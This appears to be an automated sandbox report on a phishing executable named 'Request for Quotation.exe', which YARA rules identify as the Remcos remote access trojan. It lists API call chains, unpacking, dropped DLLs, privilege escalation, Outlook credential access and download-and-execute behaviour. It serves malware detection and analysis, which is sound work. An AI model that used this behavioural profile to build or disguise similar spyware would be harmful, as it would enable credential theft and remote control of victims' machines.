          Source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/6@0/2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,3_2_004182CE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403486
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,1_2_0040EC0F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,1_1_0040EC0F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,4_2_00410DE1
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,4_1_00410DE1
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404763
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_6EEE4211 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_6EEE4211
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,1_2_00409D02
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00411927
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Users\user\AppData\Roaming\excelJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeMutant created: \Sessions\1\BaseNamedObjects\excel-8OHAVR
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsh7777.tmpJump to behavior
          Source: Request for Quotation.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem information queried: HandleInformationJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Request for Quotation.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: Request for Quotation.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: Request for Quotation.exe, 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: Request for Quotation.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: Request for Quotation.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: Request for Quotation.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: Request for Quotation.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: Request for Quotation.exeVirustotal: Detection: 27%
          Source: Request for Quotation.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile read: C:\Users\user\Desktop\Request for Quotation.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq'
          Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\rvowfdgtdozazitngptymckjrq'
          Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\uptpyvrmrwrfbohrpagsxhxaawaqan'
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq'Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\rvowfdgtdozazitngptymckjrq'Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\uptpyvrmrwrfbohrpagsxhxaawaqan'Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile opened: C:\Users\user\Desktop\Request for Quotation.cfgJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: Request for Quotation.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Request for Quotation.exe, 00000000.00000003.638506500.0000000002A70000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Request for Quotation.exe, 00000000.00000003.638506500.0000000002A70000.00000004.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeUnpacked PE file: 1.2.Request for Quotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\Request for Quotation.exeUnpacked PE file: 3.2.Request for Quotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\Desktop\Request for Quotation.exeUnpacked PE file: 4.2.Request for Quotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\Desktop\Request for Quotation.exeUnpacked PE file: 5.2.Request for Quotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeUnpacked PE file: 1.2.Request for Quotation.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_6F711A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6F711A98
          Source: aqx5kku77.dll.0.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_6F712F60 push eax; ret 0_2_6F712F8E
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00413ED0 push eax; ret 1_2_00413EFE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00413ED0 push eax; ret 1_1_00413EFE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044693D push ecx; ret 3_2_0044694D
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DB84
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DBAC
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00451D54 push eax; ret 3_2_00451D61
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00416794 push ecx; ret 3_1_004167EC
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044693D push ecx; ret 3_1_0044694D
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044DB70 push eax; ret 3_1_0044DB84
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044DB70 push eax; ret 3_1_0044DBAC
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00403C9C push ds; retf 3_1_00403D3A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00451D54 push eax; ret 3_1_00451D61
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00414060 push eax; ret 4_2_00414074
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00414060 push eax; ret 4_2_0041409C
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00414039 push ecx; ret 4_2_00414049
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_004164EB push 0000006Ah; retf 4_2_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00416553 push 0000006Ah; retf 4_2_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00416555 push 0000006Ah; retf 4_2_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00414060 push eax; ret 4_1_00414074
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00414060 push eax; ret 4_1_0041409C
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00414039 push ecx; ret 4_1_00414049
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_004164EB push 0000006Ah; retf 4_1_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00416553 push 0000006Ah; retf 4_1_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00416555 push 0000006Ah; retf 4_1_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00407A7A push 368B2BCFh; retn 29E8h4_1_00407ABD
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_00444355 push ecx; ret 5_2_00444365
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004446D0 push eax; ret 5_2_004446E4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004446D0 push eax; ret 5_2_0044470C
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_0044AC84 push eax; ret 5_2_0044AC91
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_1_0040E2C0 pushad ; iretd 5_1_0040E2C1
          Source: initial sampleStatic PE information: section name: .data entropy: 7.91187275954
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_0040D4E5
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\aqx5kku77.dllJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00411700
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_00409908
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_004113C9
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_1_004113C9
          Source: C:\Users\user\Desktop\Request for Quotation.exeWindow / User API: threadDelayed 709Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exe TID: 6012Thread sleep count: 709 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exe TID: 6012Thread sleep time: -7090000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeLast function: Thread delayed
